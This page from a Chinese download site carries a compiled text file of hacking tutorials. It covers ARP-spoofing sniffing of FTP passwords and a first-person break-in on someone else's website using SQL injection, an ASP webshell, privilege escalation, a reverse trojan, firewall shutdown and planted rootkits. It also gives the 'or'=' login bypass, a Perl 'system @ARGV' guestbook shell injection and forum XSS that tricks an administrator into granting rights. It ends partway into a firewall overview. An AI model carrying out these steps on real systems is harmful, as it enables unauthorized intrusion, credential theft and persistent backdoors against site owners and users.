⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 渗透技术.txt

📁 木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马木马
💻 TXT
📖 第 1 页 / 共 5 页
字号:
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数) 

Usage: ArpSniffer [/RESET] 

第五步:后台运行开始嗅探咯 
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat 

注意:这儿的时间要用24小时式 
arpsniffer最好拷到system32目录下,记录文件也会生成在这儿 
执行完第四步要先安装WINPCAP 2.1驱动 
同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子  本文来自无涯教程网:http://www.wuyapc.com 

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉 
以SYSTEM权限启动的ARPSniffer程序 
C:\winnt\system32>pulist 
................... 
conime.exe 248 NT AUTHORITY\SYSTEM 
explorer.exe 1864 SMSCOMPUTER\Administrator 
CSRSS.EXE 2256 NT AUTHORITY\SYSTEM 
Arpsniffer.exe 2322 NT AUTHORITY\SYSTEM ----就是它了! 
WINLOGON.EXE 2344 NT AUTHORITY\SYSTEM 
...................... 

杀了它 
C:\winnt\system32>pskill 2322 
PsKill v1.03 - local and remote process killer 
Copyright (C) 2000 Mark Russinovich 
http://www.sysinternals.com 

Process 2322 killed. 

C:\winnt\system32>type 1.txt 我的例子中嗅探的是FTP密码:)  
本文来自无涯教程网:http://www.wuyapc.com



............... 
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb 
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 
61.188.218.179(1404)->61.139.1.79(21)QUIT 
61.188.218.179(1404)->61.139.1.79(21)QUIT 
61.139.1.79(21)->61.188.218.179(1404)221 
61.139.1.79(21)->61.188.218.179(1404)221 
............ 
............ 

特别要注意的就是PASS哈:) 

---------------------------------------------------- 
付录: 
前台正常执行的显示 

C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset 

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB 
www.netXeyes.com 2002, security@vip.sina.com  
本文来自无涯教程网:http://www.wuyapc.com


Network Adapter 0: Intel(R) 8255x Based Network Connection 

Enable IP Router....OK 

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02 
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb 
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6 

Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88 
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88 
有时这儿要先显示can not open driver(0)不管它等一下就可以了 
Begin Sniffer.........  



@@@@@@@@@@



黑客攻防实战之对有防火墙机器的渗透 
 
安全中国 www.anqn.com 更新时间:2007-8-29 4:09:45 责任编辑:池天 
 
 
热 点:  
 
 前几天群里的兄弟给了一个网站www.111.com,问我可不可以入侵。 
  一、踩点

  ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。

  二、注入

  从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。

  三、提升权限

  先看哪些特权的:

  cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps

  得到:

  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows

  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.

  InProcessIsapiApps : (LIST) (5 Items)

  "C:\WINNT\system32\idq.dll"

  "C:\WINNT\system32\inetsrv\httpext.dll"

  "C:\WINNT\system32\inetsrv\httpodbc.dll"

  "C:\WINNT\system32\inetsrv\ssinc.dll"

  "C:\WINNT\system32\msw3prt.dll"

  把asp.dll加进去:

  cs cript C:\Inetpub\AdminS cripts\adsutil.vbs

  set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32

  \inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32

  \inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

  \inetsrv\asp.dll"

  然后用asp木马加个用户,显示命令完成。

  四、TerminalService

  接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的方法大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies)大家有兴趣的话可以去试一下,它可以穿透http代理。

  五、简单后门

  1.改了FSO名,这样是让我自己享受,这个有system权限的马儿。

  2.放了几个rootkit和几个网络上少见的后台。

  3.我个从是不喜欢多放后台,觉得很烦。

  六、Sniffer

  1.TS界面下,下载了些嗅探器。先ARPsniffer图形的看了一下,晕死,没有一台内网机子。又看了一个外网,晕死,整个IP段都是。看来我的运行不错嘛,打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了。
 



@@@@@@@@@@@@@
打破常规 构造特殊字符进行渗透入侵 
 
安全中国 www.anqn.com 更新时间:2007-8-30 3:34:36 责任编辑:池天 
 
 
热 点:  
 
 分析服务器的web程序,像论坛、聊天室了,发现其程序编写的bug或疏漏,从而进行80端口的渗透入侵,似乎只是黑客程序高手的事情。其实不然,虽然我们不会编写程序,但是利用构造特殊字符菜鸟一样可以来进行80端口的渗透入侵。不相信?那好,看我用特殊字符精心打造的的四把小李飞刀。 
  第一把飞刀:鱼目混珠

  我们可以用它实现在论坛里冒名发言。看中一个美眉,日思夜想想让她在论坛里对全世界说我爱你,美眉就是不说怎么办?打开记事本,按下tab键或capslock+tab键,就会形成一个特殊空格。然后复制下来,将空格放在美眉的名字后注册,啊,果然成功注册了和美眉一个同样的名字,剩下来的事就好办了。形成特殊空格的字符还有区位输入法输入的aaaa或aaab或aaac。还有一个字符是 ,在html标签里它就是空白的意思,用它也可以。我的经验是区位输入法输入的aaaa/aaab/aaac,在asp编写的程序里成功率极高,而tab键和 在php程序里成功率高。更可怕的是,在wdb论坛和ibb论坛,用tab键构造的特殊用户名可以取得和原用户相同的权限。如果原用户名是管理员,那你的构造的这个冒名用户也会变成管理员。

 第二把飞刀:瞒天过海 
  在asp动态网络编程中,经常会有验证管理员帐号和密码的登陆页面,以便进行后台管理。但是在这样的身份验证里会存在一些漏洞,例如在用户名和密码框里都输入'or'=',也可以进入管理页面。为什么会这样?我简单说一下。看原程序: user=request.form("user")

  pass=request.form("pass")

  ......

  sql="select * from guestbook where user ='"&user&"' and pass='"&pass&"'

  如果将user和pass的值我们都输入'or'=',那么上边的最后一行sql代码就会变成

  sql="select * from guestbook where user ='or'='and pass='or'='"

  如果你懂一点sql语句的话,就可以看到,我们输入的'or'='满足了程序成真的条件值,所以我们就蒙敝过关了。这样说太抽象了,信心文章管理系就存在这个漏洞,这套程序在网上一抓一大把。抓个图看看,你用我提供的特殊字符,在帐号和密码处都输入'or'='就可以就入后台管理了。

  第三把飞刀:暗渡陈仓

  最近网络上出了不少关于入侵lb论坛的文章,无一例外,它们都谈到了构造特殊字符。众所周知,如果在一个cgi或perl程序里写入system @ARGV;#这一行代码,就会形成一个网页后门。用http://ip/*.pl?dir就会看到网站的物理目录(*.pl文件里有system @ARGV;#这一行代码)。举个例子吧,agbii是一个免费的cgi留言本,网上非常流行。而你在这个留言本里留的言都是以第n条留言的数目、用户名、标题、内容等等来排列的,而且留的言的都是按第n条留言顺序排放在一个固定目录data/用户名下。说起来好像很复杂。

  像我留了一条言,是这个网站留言本的第10条留言,我用的用户名是;system,标题是@ARGV;#,内容是哈哈,仔细看签写留言的那个图,此留言本的用户就是222.然后我们执行http://192.168.1.3/book/data/222/10.pl?dir就会得到一个shell了。

  第四把飞刀:太公钓鱼

  这是一个比较有趣也比较难利用的方法,也就是网上所说的跨站脚本攻击。我说一下,我们菜鸟可以利用的方法吧。先说一个有趣的,在ubb代码中,就是我们在论坛里发贴的代码有一个bug。在[img][/img]中如果你插入的不是图像,而是一个javascript脚本,它同样会执行。我们在论坛里发一个贴子,内容如下:[img]javascript:alert("黑客x档案")[/img],当你点这个贴子就会弹出一个js对话,上书黑客x档案。

  写入[img]javascript:alert("黑客x档案");self.open("http://url")[/img],那么在弹出对话框后,又会接着打开一个新的网页窗口。如果我们在这个网页里放入网页木马呢?这里我们先不谈网页木马。我们假如得知,如果这个论坛加一个管理员hack的url是http://ip/bbs/upadmin?user=hack,当然这个url是要以管理员身份执行才可以,那么我们写入这个url,然后引诱这个论坛的真正管理员来看此贴,那么这个已登陆论坛的管理员点击此贴后,hack这个个普通注册用户就会成为这个论坛的管理员了。类似的办法,还有上传附件。我们上传一个txt附件,txt文件里就是这个加hack管理员的url,由于ie浏览器的bug,只要服务器网站文件里的文件是html码它就执行html网页,并不理会后缀名是什么。管理员点此txt附件,同样可以执行增加hack管理员的url。至于在[img][/img]或txt文件里的html、javasripct码我们可以精心构造,可以让论坛管理员点击后毫无察觉发现自己执行了一些url程序。

  最后说明,这四把飞刀并不是锋利无比,在每个服务器上都可以刀刀封喉,但对网上的大多数论坛或聊室或别的网页程序,还是......那句话......小李飞刀,名不虚传。
 


@@@@@@@@@@

全面分析防火墙及防火墙的渗透 
 
安全中国 www.anqn.com 更新时间:2007-8-31 1:04:00 责任编辑:池天 
 
 
热 点:  
 
(一)防火墙介绍
  
  防火墙是一种功能,它使得内部网络和外部网络或Internet互相隔离,以此来保护内部网络或主机。简单的防火墙可以由Router,3 Layer Switch的ACL(access control list)来充当,也可以用一台主机,甚至是一个子网来实现。复杂的可以购买专门的硬件防火墙或软件防火墙来实现。
  
  防火墙的功能有:
  
  1、过滤掉不安全服务和非法用户
  
  2、控制对特殊站点的访问
  
  3、提供监视Internet安全和预警的方便端点
  
  防火墙并不是万能的,也有很多防火墙无能为力的地方:
  
  1、防火墙防不住绕过防火墙的攻击。比如,防火墙不限制从内部网络到外部网络的连接,那么,一些内部用户可能形成一个直接通往Internet的连接,从而绕过防火墙,造成一个潜在的backdoor.恶意的外部用户直接连接到内部用户的

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -